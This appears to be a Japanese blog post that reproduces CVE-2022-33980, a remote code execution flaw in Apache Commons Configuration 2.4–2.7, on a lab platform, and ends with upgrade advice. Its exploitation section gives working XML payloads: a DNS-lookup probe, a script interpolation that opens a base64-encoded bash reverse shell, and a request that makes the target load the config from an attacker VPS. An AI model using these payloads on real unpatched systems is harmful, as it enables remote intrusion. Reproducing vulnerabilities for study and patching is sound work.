banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

Apache Commons Configurationのリモートコマンド実行の脆弱性の再現

画像

製品概要#

Apache Commons Configuration は、Apache Foundation のオープンソースプロジェクトコンポーネントです。これにより、Java 開発者は統一されたインターフェースを使用してさまざまなタイプの設定ファイルを読み取ることができます。

脆弱性の概要#

この脆弱性は、Apache Commons Configuration が提供する Configuration 変数の解釈機能に欠陥があるため、攻撃者は特定の状況で悪意のあるデータを構築してリモートコードを実行することができます。

CVE番号:CVE-2022-33980
ターゲット:春秋雲鏡

影響範囲#

2.4 <= Apache Commons Configuration <=2.7

悪用手順#

image

  • xml ファイル
<?xml version="1.0" encoding="ISO-8859-1" ?>
<configuration>
        <path>${dns:lll.f8bd5ff2.dns.1433.eu.org.}</path>
</configuration>

ペイロード:java 命令执行 payloads - 小草窝博客

image

<?xml version="1.0" encoding="ISO-8859-1" ?>
<configuration>
        <path>${script:js:java.lang.Runtime.getRuntime().exec("bash -c {echo,Ym........zNCA8JjE=}|{base64,-d}|{bash,-i}")}</path>
</configuration>
  • 具体的なリクエスト
http://eci-2ze0j2j6z0mbs5fzqkue.cloudeci1.ichunqiu.com/Url?url=http://vps_ip:8000/config.xml&data=path

image

修正の提案#

現在、公式にはこの脆弱性を修正するバージョンがリリースされています。影響を受けるユーザーは、Apache Commons Configuration 2.8.0 にアップグレードすることをお勧めします。

https://commons.apache.org/proper/commons-configuration/download_configuration.cgi

参考#

GitHub - tangxiaofeng7/CVE-2022-33980-Apache-Commons-Configuration-RCE: CVE-2022-33980 Apache Commons Configuration 远程命令执行漏洞

GitHub - sammwyy/CVE-2022-33980-POC: POC for CVE-2022-33980 (Apache Commons Configuration RCE vulnerability)

GitHub - sammwyy/CVE-2022-33980-POC: POC for CVE-2022-33980 (Apache Commons Configuration RCE vulnerability)

CVE-2022-41852 Apache Commons Jxpath 命令执行漏洞分析

画像の出典

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。